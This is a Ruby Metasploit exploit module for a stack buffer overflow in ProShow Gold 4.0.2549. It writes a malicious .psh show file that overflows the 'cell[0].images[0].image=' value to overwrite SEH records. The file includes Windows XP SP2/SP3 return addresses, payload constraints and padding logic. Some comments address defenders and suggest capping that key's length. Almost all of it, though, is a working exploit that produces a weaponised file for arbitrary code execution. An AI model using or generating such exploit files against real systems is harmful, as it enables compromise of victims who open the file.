require 'msf/core'

# File-format exploit module for ProShow Gold 4.0.2549 (OSVDB 57226).
#
# The module writes a single .psh show file in which the value of the
# cell[0].images[0].image= key is oversized; the vulnerable parser copies it
# without a bounds check, overwriting the SEH chain. Two SEH records are
# emitted because, per the comments in #exploit, the frame offset differs
# depending on how the file is opened (command line vs. file-open icon).
#
# Defender notes grounded in this module: the trigger is a .psh file whose
# `cell[n].images[n].image=` value is several thousand characters long
# (4032 upper-case letters plus the payload here); the header fields
# (Version=0, proshowVersion=2549, title=, fileName=, makeFileLocalFolder=)
# are otherwise plausible. A content check that caps that key's length is a
# cheap detection/mitigation for this specific pattern.
class Metasploit3 < Msf::Exploit::Remote
  # Provides file_create / FILENAME / OUTPUTPATH handling.
  include Msf::Exploit::FILEFORMAT
  # Provides generate_seh_payload(ret).
  include Msf::Exploit::Remote::Seh

  # Registers module metadata, targets and the two file-location options.
  #
  # @param info [Hash] metadata merged by update_info (Metasploit convention)
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProShow Gold PSH Buffer Overflow.',
      'Description'    => %q{ This module exploits a stack-based buffer overflow in ProShow Gold 4.0.2549 resulting from unchecked bounds on the cell[index].images[index].image= key value pair. Note: This bug is screwy SEH-offset-wise. },
      'License'        => MSF_LICENSE,
      'Author'         => 'SaintPatrick ',
      'Version'        => '$Revision:$',
      'References'     =>
        [
          ['OSVDB', '57226'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          # Payload must fit in 1000 bytes and avoid NUL, CR, LF and backslash,
          # which would terminate or corrupt the key/value line in the .psh file.
          'Space'           => 1000,
          'BadChars'        => "\x00\x0D\x0A\x5C",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      # 'Ret' is the SEH handler address used for each target; the two
      # differ only in their third byte (service-pack-specific module base).
      'Targets'        =>
        [
          [ 'Windows XP SP2', { 'Ret' => 0x032311CD }],
          [ 'Windows XP SP3', { 'Ret' => 0x032C11CD }],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 20 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.', 'slideshow.psh']),
        OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
      ], self.class)
  end

  # Builds the malicious .psh file in memory and writes it out via
  # file_create (location and name come from OUTPUTPATH / FILENAME).
  #
  # Layout of the generated file:
  #   1. A plausible ProShow header (version, title, paths, cell count).
  #   2. cell[0].images[0].image= followed by 4032 upper-case filler bytes.
  #   3. First SEH record + payload (generate_seh_payload), then alphabetic
  #      padding so the second record lands exactly 2376 bytes later.
  #   4. Second SEH record + payload for the alternate load path.
  #
  # The random title/path components only make the header look varied; the
  # bytes that matter are the fixed-length filler and the two SEH records.
  def exploit
    # Header stuff.
    psh = "Photodex(R) ProShow(TM) Show File Version=0\r\n"
    psh << "proshowVersion=2549\r\n"
    psh << 'title=' + rand_text_alpha(10) + "\r\n"
    psh << 'fileName=My Computer/C:/Documents and Settings/' + rand_text_alpha(7) + '/Desktop/' + rand_text_alpha(10) + ".psh\r\n"
    psh << "description=\"\"\r\n"
    psh << "makeFileLocalFolder=C:\\Documents and Settings\\" + rand_text_alpha(7) + "\\My Documents\r\n"
    psh << "cells=2\r\n"
    psh << "cell[0].imageEnable=1\r\n"
    psh << "cell[0].nrOfImages=1\r\n"

    # Trigger + Payload
    # 4032 bytes of filler reach the first SEH frame; this is the oversized
    # value a content filter can key on.
    psh << "cell[0].images[0].image=" + rand_text_alpha_upper(4032)

    # SEH Frame offset if loaded by command line in SP2
    buf1 = generate_seh_payload(target.ret)
    psh << buf1
    # Pad so the second SEH record sits 2376 bytes after the first, whatever
    # length the Seh mixin returned for buf1 (assumes buf1.length <= 2376).
    psh << rand_text_alpha(2376 - buf1.length)

    # SEH Frame offset if loaded through file open icon both SP2/SP3
    buf2 = generate_seh_payload(target.ret)
    psh << buf2

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(psh)
  end
end